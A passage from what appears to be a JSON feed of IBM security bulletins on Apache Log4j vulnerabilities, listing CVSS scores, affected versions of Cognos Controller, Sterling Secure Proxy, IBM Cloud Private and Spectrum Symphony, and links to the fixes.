Cognos Controller 10.4.2.0 Apache Log4j Work-around\" )\n\nThe patch is applicable to IBM Cognos Controller version 10.4.2. \n\nThe instructions will guide you to replace the log4j vulnerable files manually without impacting your current product version. \n\nPlease note that this mitigation also addresses CVE-2021-45105. \n\n## Get Notified about Future Security Bulletins\n\nSubscribe to [My Notifications](< http://www-01.ibm.com/software/support/einfo.html>) to be notified of important product support alerts like this.\n\n### References \n\n[Complete CVSS v3 Guide](<http://www.first.org/cvss/user-guide> \"Link resides outside of ibm.com\" ) \n[On-line Calculator v3](<http://www.first.org/cvss/calculator/3.0> \"Link resides outside of ibm.com\" )\n\nOff \n\n## Related Information\n\n[IBM Secure Engineering Web Portal](<http://www.ibm.com/security/secure-engineering/bulletins.html>) \n[IBM Product Security Incident Response Blog](<http://www.ibm.com/blogs/psirt>)\n\n## Acknowledgement\n\n## Change History\n\n21 Dec 2021: \nAdded no-upgrade option to Workarounds and MitigationsNote for clients using IBM Cognos Analytics in Affected Products and VersionsIBM Cognos Controller on Cloud remediation completion in Remediation/Fixes \n21 Dec 2021: \nFixed typo in Summary \n20 Dec 2021: \nInitial Publication\n\n*The CVSS Environment Score is customer environment specific and will ultimately impact the Overall CVSS Score. Customers can evaluate the impact of this vulnerability in their environments by accessing the links in the Reference section of this Security Bulletin.\n\n## Disclaimer\n\nAccording to the Forum of Incident Response and Security Teams (FIRST), the Common Vulnerability Scoring System (CVSS) is an \"industry open standard designed to convey vulnerability severity and help to determine urgency and priority of response.\" IBM PROVIDES THE CVSS SCORES \"\"AS IS\"\" WITHOUT WARRANTY OF ANY KIND, INCLUDING THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. CUSTOMERS ARE RESPONSIBLE FOR ASSESSING THE IMPACT OF ANY ACTUAL OR POTENTIAL SECURITY VULNERABILITY. In addition to other efforts to address potential vulnerabilities, IBM periodically updates the record of components contained in our product offerings. As part of that effort, if IBM identifies previously unidentified packages in a product/service inventory, we address relevant vulnerabilities regardless of CVE date. Inclusion of an older CVEID does not demonstrate that the referenced product has been used by IBM since that date, nor that IBM was aware of a vulnerability as of that date. We are making clients aware of relevant vulnerabilities as we become aware of them. \"Affected Products and Versions\" referenced in IBM Security Bulletins are intended to be only products and versions that are supported by IBM and have not passed their end-of-support or warranty date. Thus, failure to reference unsupported or extended-support products and versions in this Security Bulletin does not constitute a determination by IBM that they are unaffected by the vulnerability. Reference to one or more unsupported versions in this Security Bulletin shall not create an obligation for IBM to provide fixes for any unsupported or extended-support products or versions.\n\n## Document Location\n\nWorldwide\n\n[{\"Business Unit\":{\"code\":\"BU059\",\"label\":\"IBM Software w\\/o TPS\"},\"Product\":{\"code\":\"SS9S6B\",\"label\":\"Cognos Controller\"},\"Component\":\"\",\"Platform\":[{\"code\":\"PF025\",\"label\":\"Platform Independent\"}],\"Version\":\"10.4.2\",\"Edition\":\"\",\"Line of Business\":{\"code\":\"LOB10\",\"label\":\"Data and AI\"}}]", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-22T02:58:49", "type": "ibm", "title": "Security Bulletin: IBM Cognos Controller 10.4.2 IF16: Apache Log4j vulnerability (CVE-2021-45046)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228", "CVE-2021-45046", "CVE-2021-45105"], "modified": "2021-12-22T02:58:49", "id": "5A77C3590D23BFD85FBC46CAC465870596841D78EFCD8AD2320EF501E87B107A", "href": "https://www.ibm.com/support/pages/node/6528580", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-03-25T23:45:00", "description": "## Summary\n\nIBM Sterling Secure Proxy is vulnerable to denial of service and arbitrary code execution due to Apache Log4j, which is used for logging (CVE-2021-45105,CVE-2021-45046). The fix includes Apache Log4j 2.17.0.\n\n## Vulnerability Details\n\n** CVEID: **[CVE-2021-45105](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-45105>) \n** DESCRIPTION: **Apache Log4j is vulnerable to a denial of service, caused by the failure to protect from uncontrolled recursion from self-referential lookups. A remote attacker with control over Thread Context Map (MDC) input data could craft malicious input data that contains a recursive lookup to cause a StackOverflowError that will terminate the process. Note: The vulnerability is also called LOG4J2-3230. \nCVSS Base score: 7.5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/215647](<https://exchange.xforce.ibmcloud.com/vulnerabilities/215647>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H) \n \n** CVEID: **[CVE-2021-45046](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-45046>) \n** DESCRIPTION: **Apache Log4j could result in remote code execution, caused by an incomplete fix of CVE-2021-44228 in certain non-default configurations. When the logging configuration uses a non-default Pattern Layout with a Context Lookup, an attacker with control over Thread Context Map (MDC) input data can craft malicious input data using a JNDI Lookup pattern to leak sensitive information and remote code execution in some environments and local code execution in all environments. \nCVSS Base score: 9 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/215195](<https://exchange.xforce.ibmcloud.com/vulnerabilities/215195>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\n**Affected Product(s)**| **Version(s)** \n---|--- \nIBM Sterling Secure Proxy| 3.4.3.2 \nIBM Sterling Secure Proxy| 6.0.2 \nIBM Sterling Secure Proxy| 6.0.3 \n \n \n\n\n## Remediation/Fixes\n\n**IBM strongly recommends addressing the vulnerability now.**\n\nSee the Fix Central links below for Apache Log4j 2.17.0 jar files and installation instructions for an immediate remediation of the vulnerabilities prior to full iFixes for the associated releases. \n\n**Product**| **VRMF**| **Remediation** \n---|---|--- \nIBM Sterling Secure Proxy| 6.0.3| [Fix Central - 6030](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm%7EOther%20software&product=ibm/Other+software/Sterling+Secure+Proxy&release=6.0.3.0&platform=All&function=all> \"Fix Central - 6030\" ) \nIBM Sterling Secure Proxy| 6.0.2| [Fix Central - 6030](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm%7EOther%20software&product=ibm/Other+software/Sterling+Secure+Proxy&release=6.0.3.0&platform=All&function=all> \"Fix Central - 6030\" ) \nIBM Sterling Secure Proxy| 3.4.3.2| [Fix Central - 6030](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm%7EOther%20software&product=ibm/Other+software/Sterling+Secure+Proxy&release=6.0.3.0&platform=All&function=all> \"Fix Central - 6030\" ) \n \nThe [Fix Central - 6030](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm%7EOther%20software&product=ibm/Other+software/Sterling+Secure+Proxy&release=6.0.3.0&platform=All&function=all> \"Fix Central - 6030\" ) link points to a fix called SSP-SEAS-log4j-2.17.0-jars-for-CVE-2021-45105 which supplies the jars and instructions to replace them. This fix remediates CVE-2021-44228, CVE-2021-45046 and CVE-2021-45105.\n\n## Workarounds and Mitigations\n\nNone\n\n## Get Notified about Future Security Bulletins\n\nSubscribe to [My Notifications](< http://www-01.ibm.com/software/support/einfo.html>) to be notified of important product support alerts like this.\n\n### References \n\n[Complete CVSS v3 Guide](<http://www.first.org/cvss/user-guide> \"Link resides outside of ibm.com\" ) \n[On-line Calculator v3](<http://www.first.org/cvss/calculator/3.0> \"Link resides outside of ibm.com\" )\n\nOff \n\n## Related Information\n\n[IBM Secure Engineering Web Portal](<http://www.ibm.com/security/secure-engineering/bulletins.html>) \n[IBM Product Security Incident Response Blog](<http://www.ibm.com/blogs/psirt>)\n\n## Change History\n\n04 Jan 2022: Initial Publication\n\n*The CVSS Environment Score is customer environment specific and will ultimately impact the Overall CVSS Score. Customers can evaluate the impact of this vulnerability in their environments by accessing the links in the Reference section of this Security Bulletin.\n\n## Disclaimer\n\nAccording to the Forum of Incident Response and Security Teams (FIRST), the Common Vulnerability Scoring System (CVSS) is an \"industry open standard designed to convey vulnerability severity and help to determine urgency and priority of response.\" IBM PROVIDES THE CVSS SCORES \"\"AS IS\"\" WITHOUT WARRANTY OF ANY KIND, INCLUDING THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. CUSTOMERS ARE RESPONSIBLE FOR ASSESSING THE IMPACT OF ANY ACTUAL OR POTENTIAL SECURITY VULNERABILITY.\n\n## Document Location\n\nWorldwide\n\n[{\"Business Unit\":{\"code\":\"BU059\",\"label\":\"IBM Software w\\/o TPS\"},\"Product\":{\"code\":\"SS6PNW\",\"label\":\"IBM Sterling Secure Proxy\"},\"Component\":\"\",\"Platform\":[{\"code\":\"PF002\",\"label\":\"AIX\"},{\"code\":\"PF027\",\"label\":\"Solaris\"},{\"code\":\"PF016\",\"label\":\"Linux\"},{\"code\":\"PF051\",\"label\":\"Linux on IBM Z Systems\"},{\"code\":\"PF010\",\"label\":\"HP-UX\"},{\"code\":\"PF033\",\"label\":\"Windows\"}],\"Version\":\"6.0.3, 6.0.2, 3.4.3.2\",\"Edition\":\"\",\"Line of Business\":{\"code\":\"LOB02\",\"label\":\"AI Applications\"}}]", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-01-04T16:02:00", "type": "ibm", "title": "Security Bulletin: Multiple vulnerabilities in Apache Log4j impact IBM Sterling Secure Proxy (CVE-2021-45105, CVE-2021-45046)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228", "CVE-2021-45046", "CVE-2021-45105"], "modified": "2022-01-04T16:02:00", "id": "1C6CC8129E7AEC5C314CCFD7570FC09548438820946E9774FD2E2410C0897958", "href": "https://www.ibm.com/support/pages/node/6538100", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-06-28T22:07:14", "description": "## Summary\n\nThere is a vulnerability in the Apache Log4j open source library. The library is used by Elasticsearch, a dependency of IBM Cloud Private, for logging messages to files. This bulletin identifies the security fixes to apply to address the Log4Shell vulnerability (CVE-2021-45105). \n\n## Vulnerability Details\n\n** CVEID: **[CVE-2021-45105](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-45105>) \n** DESCRIPTION: **Apache Log4j is vulnerable to a denial of service, caused by the failure to protect from uncontrolled recursion from self-referential lookups. A remote attacker with control over Thread Context Map (MDC) input data could craft malicious input data that contains a recursive lookup to cause a StackOverflowError that will terminate the process. Note: The vulnerability is also called LOG4J2-3230. \nCVSS Base score: 7.5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/215647](<https://exchange.xforce.ibmcloud.com/vulnerabilities/215647>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H)\n\n## Affected Products and Versions\n\nAffected Product(s)| Version(s) \n---|--- \nIBM Cloud Private| 3.1.0 \nIBM Cloud Private| 3.1.1 \nIBM Cloud Private| 3.1.2 \nIBM Cloud Private| 3.2.0 \nIBM Cloud Private| 3.2.1 CD \nIBM Cloud Private| 3.2.2 CD \n \n## Remediation/Fixes\n\n**IBM strongly recommends addressing the vulnerability now by upgrading.**\n\nThe recommended solution involves the IBM Cloud Private ibm-icplogging component. It is recommended that you follow the instructions for the component in the links listed below:\n\nFor IBM Cloud Private 3.1.0: [IBM Cloud Private 3.1.0 Patch](<http://www.ibm.com/support/fixcentral/swg/selectFixes?product=ibm/WebSphere/IBM+Cloud+Private&release=All&platform=All&function=fixId&fixids=icp-3.1.0-build600961-51486&includeSupersedes=0> \"IBM Cloud Private 3.1.0 Patch\" )\n\nFor IBM Cloud Private 3.1.1: [IBM Cloud Private 3.1.1 Patch](<https://www.ibm.com/support/fixcentral/swg/selectFixes?product=ibm/WebSphere/IBM+Cloud+Private&release=All&platform=All&function=fixId&fixids=icp-3.1.1-build600916-51406&includeSupersedes=0> \"IBM Cloud Private 3.1.1 Patch\" )\n\nFor IBM Cloud Private 3.1.2: [IBM Cloud Private 3.1.2 Patch](<https://www.ibm.com/support/fixcentral/swg/selectFixes?product=ibm/WebSphere/IBM+Cloud+Private&release=All&platform=All&function=fixId&fixids=icp-3.1.2-build600891-51342&includeSupersedes=0> \"IBM Cloud Private 3.1.2 Patch\" )\n\nFor IBM Cloud Private 3.2.0: [IBM Cloud Private 3.2.0 Patch](<https://www.ibm.com/support/fixcentral/swg/selectFixes?product=ibm/WebSphere/IBM+Cloud+Private&release=All&platform=All&function=fixId&fixids=icp-3.2.0-build600917-51405&includeSupersedes=0> \"IBM Cloud Private 3.2.0 Patch\" )\n\nFor IBM Cloud Private 3.2.1: [IBM Cloud Private 3.2.1 Patch](<https://www.ibm.com/support/fixcentral/swg/selectFixes?product=ibm/WebSphere/IBM+Cloud+Private&release=All&platform=All&function=fixId&fixids=icp-3.2.1-build600890-51324&includeSupersedes=0> \"IBM Cloud Private 3.2.1 Patch\" )\n\nFor IBM Cloud Private 3.2.2: [IBM Cloud Private 3.2.2 Patch](<https://www.ibm.com/support/fixcentral/swg/selectFixes?product=ibm/WebSphere/IBM+Cloud+Private&release=All&platform=All&function=fixId&fixids=icp-3.2.2-build600889-51343&includeSupersedes=0> \"IBM Cloud Private 3.2.2 Patch\" )\n\nFor IBM Cloud Private 3.1.0:\n\n * Upgrade to the latest Continuous Delivery (CD) update package, IBM Cloud Private 3.2.2. \n\n## Workarounds and Mitigations\n\nNone\n\n## Get Notified about Future Security Bulletins\n\nSubscribe to [My Notifications](< http://www-01.ibm.com/software/support/einfo.html>) to be notified of important product support alerts like this.\n\n### References \n\n[Complete CVSS v3 Guide](<http://www.first.org/cvss/user-guide> \"Link resides outside of ibm.com\" ) \n[On-line Calculator v3](<http://www.first.org/cvss/calculator/3.0> \"Link resides outside of ibm.com\" )\n\nOff \n\n**Details of the ElasticSearch remediation for IBM Cloud Private Version 3.2.1 and 3.2.2**\n\nThe ibm-icplogging component has been updated to use Elasticsearch 6.8.22. This release upgrades the Log4j package to 2.17.0, which remediates the log4j vulnerabilities and should not trigger false positives in vulnerability scanners as was the case with Elasticsearch 6.8.21. \n\nElasticsearch announcement (ESA-2021-31)\n\n<https://discuss.elastic.co/t/apache-log4j2-remote-code-execution-rce-vulnerability-cve-2021-44228-esa-2021-31/291476>\n\n**Details of the ElasticSearch remediation for IBM Cloud Private Version 3.1.0, 3.1.1, 3.1.2, and 3.2.0**\n\nElasticsearch and Logstash within ibm-icplogging component have been updated to remediate the log4j vulnerabilities by removing the vulnerable JndiLookup class from the log4j-core package. Some vulnerability scanners may continue to flag Elasticsearch in association with this vulnerability based on the Log4j version alone. However, the mitigation sufficiently protects both remote code execution and information leakage.\n\nElasticsearch 5.0.0-5.6.10 and 6.0.0-6.3.2: Log4j CVE-2021-44228, CVE-2021-45046 remediation\n\n<https://discuss.elastic.co/t/elasticsearch-5-0-0-5-6-10-and-6-0-0-6-3-2-log4j-cve-2021-44228-cve-2021-45046-remediation/292054>\n\nLogstash 5.0.0-6.8.20 and 7.0.0-7.16.0: Log4j CVE-2021-44228, CVE-2021-45046 remediation\n\n<https://discuss.elastic.co/t/logstash-5-0-0-6-8-20-and-7-0-0-7-16-0-log4j-cve-2021-44228-cve-2021-45046-remediation/292343>\n\n## Related Information\n\n[IBM Secure Engineering Web Portal](<http://www.ibm.com/security/secure-engineering/bulletins.html>) \n[IBM Product Security Incident Response Blog](<http://www.ibm.com/blogs/psirt>)\n\n## Acknowledgement\n\n## Change History\n\n21 Dec 2021: Initial Publication \n22 Dec 2021: Add patch links for 3.1.1, 3.1.2, 3.2.0 \n18 Jan 2022: Add patch link for 3.1.0\n\n*The CVSS Environment Score is customer environment specific and will ultimately impact the Overall CVSS Score. Customers can evaluate the impact of this vulnerability in their environments by accessing the links in the Reference section of this Security Bulletin.\n\n## Disclaimer\n\nAccording to the Forum of Incident Response and Security Teams (FIRST), the Common Vulnerability Scoring System (CVSS) is an \"industry open standard designed to convey vulnerability severity and help to determine urgency and priority of response.\" IBM PROVIDES THE CVSS SCORES \"\"AS IS\"\" WITHOUT WARRANTY OF ANY KIND, INCLUDING THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. CUSTOMERS ARE RESPONSIBLE FOR ASSESSING THE IMPACT OF ANY ACTUAL OR POTENTIAL SECURITY VULNERABILITY. In addition to other efforts to address potential vulnerabilities, IBM periodically updates the record of components contained in our product offerings. As part of that effort, if IBM identifies previously unidentified packages in a product/service inventory, we address relevant vulnerabilities regardless of CVE date. Inclusion of an older CVEID does not demonstrate that the referenced product has been used by IBM since that date, nor that IBM was aware of a vulnerability as of that date. We are making clients aware of relevant vulnerabilities as we become aware of them. \"Affected Products and Versions\" referenced in IBM Security Bulletins are intended to be only products and versions that are supported by IBM and have not passed their end-of-support or warranty date. Thus, failure to reference unsupported or extended-support products and versions in this Security Bulletin does not constitute a determination by IBM that they are unaffected by the vulnerability. Reference to one or more unsupported versions in this Security Bulletin shall not create an obligation for IBM to provide fixes for any unsupported or extended-support products or versions.\n\n## Document Location\n\nWorldwide\n\n[{\"Business Unit\":{\"code\":\"BU059\",\"label\":\"IBM Software w\\/o TPS\"},\"Product\":{\"code\":\"SSBS6K\",\"label\":\"IBM Cloud Private\"},\"Component\":\"\",\"Platform\":[{\"code\":\"PF016\",\"label\":\"Linux\"}],\"Version\":\"all\",\"Edition\":\"\",\"Line of Business\":{\"code\":\"LOB45\",\"label\":\"Automation\"}}]", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-01-27T12:23:17", "type": "ibm", "title": "Security Bulletin: Vulnerability in Apache Log4j affects IBM Cloud Private (CVE-2021-45105)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228", "CVE-2021-45046", "CVE-2021-45105"], "modified": "2022-01-27T12:23:17", "id": "3F4820A3C64022355AE6B658B22CB04D75AF98980AA0D9E31E518E440502939E", "href": "https://www.ibm.com/support/pages/node/6529458", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-02-18T23:47:17", "description": "## Summary\n\nApache Log4j is used by IBM Spectrum Symphony for generating logs in some of its components such as ELK, GUI and so on. This bulletin provides interim fixes which include Apache Log4j 2.17.1 to fix arbitrary code execution (CVE-2021-44832 and CVE-2021-45046) and denial of service (CVE-2021-45105) in IBM Spectrum Symphony.\n\n## Vulnerability Details\n\n** CVEID: **[CVE-2021-45105](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-45105>) \n** DESCRIPTION: **Apache Log4j is vulnerable to a denial of service, caused by the failure to protect from uncontrolled recursion from self-referential lookups. A remote attacker with control over Thread Context Map (MDC) input data could craft malicious input data that contains a recursive lookup to cause a StackOverflowError that will terminate the process. Note: The vulnerability is also called LOG4J2-3230. \nCVSS Base score: 7.5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/215647](<https://exchange.xforce.ibmcloud.com/vulnerabilities/215647>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H) \n \n** CVEID: **[CVE-2021-45046](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-45046>) \n** DESCRIPTION: **Apache Log4j could result in remote code execution, caused by an incomplete fix of CVE-2021-44228 in certain non-default configurations. When the logging configuration uses a non-default Pattern Layout with a Context Lookup, an attacker with control over Thread Context Map (MDC) input data can craft malicious input data using a JNDI Lookup pattern to leak sensitive information and remote code execution in some environments and local code execution in all environments. \nCVSS Base score: 9 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/215195](<https://exchange.xforce.ibmcloud.com/vulnerabilities/215195>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H) \n \n** CVEID: **[CVE-2021-44832](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44832>) \n** DESCRIPTION: **Apache Log4j could allow a remote attacker with permission to modify the logging configuration file to execute arbitrary code on the system. By constructing a malicious configuration using a JDBC Appender with a data source referencing a JNDI URI , an attacker could exploit this vulnerability to execute remote code. \nCVSS Base score: 6.6 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/216189](<https://exchange.xforce.ibmcloud.com/vulnerabilities/216189>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\n_**Affected Product(s)**_| _**Version(s)**_ \n---|--- \nIBM Spectrum Symphony| 7.2, 7.2.0.2 \nIBM Spectrum Symphony| 7.2.1, 7.2.1.1 \nIBM Spectrum Symphony| 7.3 \nIBM Spectrum Symphony| 7.3.1 \nIBM Spectrum Symphony| 7.3.2 \n \n## Remediation/Fixes\n\n**IBM strongly recommends addressing the vulnerabilities now by upgrading the following interim fixes in the table:**\n\n_**Products**_| _**VRMF**_| _**APAR**_| _**Remediation/First Fix**_ \n---|---|---|--- \nIBM Spectrum Symphony| \n\n7.2/7.2.0.2\n\n| \n\nP104544\n\nP104504\n\nP104509\n\nP104522\n\nP104521\n\n| \n\n[sym-7.2-build600980](<http://www.ibm.com/support/fixcentral/swg/selectFixes?product=ibm/Other+software/IBM+Spectrum+Symphony&release=All&platform=All&function=fixId&fixids=sym-7.2-build600980&includeSupersedes=0> \"sym-7.2-build600980\" )\n\n[sym-7.2.0.2-build600934](<http://www.ibm.com/support/fixcentral/swg/selectFixes?product=ibm/Other+software/IBM+Spectrum+Symphony&release=All&platform=All&function=fixId&fixids=sym-7.2.0.2-build600934&includeSupersedes=0> \"sym-7.2.0.2-build600934\" )\n\n[sym-7.2.0.2-build600939](<http://www.ibm.com/support/fixcentral/swg/selectFixes?product=ibm/Other+software/IBM+Spectrum+Symphony&release=All&platform=All&function=fixId&fixids=sym-7.2.0.2-build600939&includeSupersedes=0> \"sym-7.2.0.2-build600939\" )\n\n[sym-7.2.0.2-build600941](<http://www.ibm.com/support/fixcentral/swg/selectFixes?product=ibm/Other+software/IBM+Spectrum+Symphony&release=All&platform=All&function=fixId&fixids=sym-7.2.0.2-build600941&includeSupersedes=0> \"sym-7.2.0.2-build600941\" )\n\n[sym-7.2.0.2-build600944](<http://www.ibm.com/support/fixcentral/swg/selectFixes?product=ibm/Other+software/IBM+Spectrum+Symphony&release=All&platform=All&function=fixId&fixids=sym-7.2.0.2-build600944&includeSupersedes=0> \"sym-7.2.0.2-build600944\" ) \n \nIBM Spectrum Symphony| 7.2.1/7.2.1.1| \n\nP104505\n\nP104510\n\nP104524\n\nP104523\n\n| \n\n[sym-7.2.1-build600935](<http://www.ibm.com/support/fixcentral/swg/selectFixes?product=ibm/Other+software/IBM+Spectrum+Symphony&release=All&platform=All&function=fixId&fixids=sym-7.2.1-build600935&includeSupersedes=0> \"sym-7.2.1-build600935\" )\n\n[sym-7.2.1-build600940](<http://www.ibm.com/support/fixcentral/swg/selectFixes?product=ibm/Other+software/IBM+Spectrum+Symphony&release=All&platform=All&function=fixId&fixids=sym-7.2.1-build600940&includeSupersedes=0> \"sym-7.2.1-build600940\" )\n\n[sym-7.2.1-build600942](<http://www.ibm.com/support/fixcentral/swg/selectFixes?product=ibm/Other+software/IBM+Spectrum+Symphony&release=All&platform=All&function=fixId&fixids=sym-7.2.1-build600942&includeSupersedes=0> \"sym-7.2.1-build600942\" )\n\n[sym-7.2.1-build600945](<http://www.ibm.com/support/fixcentral/swg/selectFixes?product=ibm/Other+software/IBM+Spectrum+Symphony&release=All&platform=All&function=fixId&fixids=sym-7.2.1-build600945&includeSupersedes=0> \"sym-7.2.1-build600945\" ) \n \nIBM Spectrum Symphony| 7.3| \n\nP104506\n\nP104508\n\n| \n\n[sym-7.3-build600936](<http://www.ibm.com/support/fixcentral/swg/selectFixes?product=ibm/Other+software/IBM+Spectrum+Symphony&release=All&platform=All&function=fixId&fixids=sym-7.3-build600936&includeSupersedes=0> \"sym-7.3-build600936\" )\n\n[sym-7.3-build600943](<http://www.ibm.com/support/fixcentral/swg/selectFixes?product=ibm/Other+software/IBM+Spectrum+Symphony&release=All&platform=All&function=fixId&fixids=sym-7.3-build600943&includeSupersedes=0> \"sym-7.3-build600943\" ) \n \nIBM Spectrum Symphony| 7.3.1| P104507| [sym-7.3.1-build600937](<http://www.ibm.com/support/fixcentral/swg/selectFixes?product=ibm/Other+software/IBM+Spectrum+Symphony&release=All&platform=All&function=fixId&fixids=sym-7.3.1-build600937&includeSupersedes=0> \"sym-7.3.1-build600937\" ) \nIBM Spectrum Symphony| 7.3.2| P104511| [sym-7.3.2-build600938](<http://www.ibm.com/support/fixcentral/swg/selectFixes?product=ibm/Other+software/IBM+Spectrum+Symphony&release=All&platform=All&function=fixId&fixids=sym-7.3.2-build600938&includeSupersedes=0> \"sym-7.3.2-build600938\" ) \n \n## Workarounds and Mitigations\n\nAs detailed above in the **Remediation / Fixes **section.\n\n## Get Notified about Future Security Bulletins\n\nSubscribe to [My Notifications](< http://www-01.ibm.com/software/support/einfo.html>) to be notified of important product support alerts like this.\n\n### References \n\n[Complete CVSS v3 Guide](<http://www.first.org/cvss/user-guide> \"Link resides outside of ibm.com\" ) \n[On-line Calculator v3](<http://www.first.org/cvss/calculator/3.0> \"Link resides outside of ibm.com\" )\n\nOff \n\n## Related Information\n\n[IBM Secure Engineering Web Portal](<http://www.ibm.com/security/secure-engineering/bulletins.html>) \n[IBM Product Security Incident Response Blog](<http://www.ibm.com/blogs/psirt>)\n\n## Acknowledgement\n\n## Change History\n\n10 Jan 2022: Initial Publication\n\n*The CVSS Environment Score is customer environment specific and will ultimately impact the Overall CVSS Score. Customers can evaluate the impact of this vulnerability in their environments by accessing the links in the Reference section of this Security Bulletin.\n\n## Disclaimer\n\nAccording to the Forum of Incident Response and Security Teams (FIRST), the Common Vulnerability Scoring System (CVSS) is an \"industry open standard designed to convey vulnerability severity and help to determine urgency and priority of response.\" IBM PROVIDES THE CVSS SCORES \"\"AS IS\"\" WITHOUT WARRANTY OF ANY KIND, INCLUDING THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. CUSTOMERS ARE RESPONSIBLE FOR ASSESSING THE IMPACT OF ANY ACTUAL OR POTENTIAL SECURITY VULNERABILITY.\n\n## Document Location\n\nWorldwide\n\n[{\"Business Unit\":{\"code\":\"BU059\",\"label\":\"IBM Software w\\/o TPS\"},\"Product\":{\"code\":\"SSZUMP\",\"label\":\"IBM Spectrum 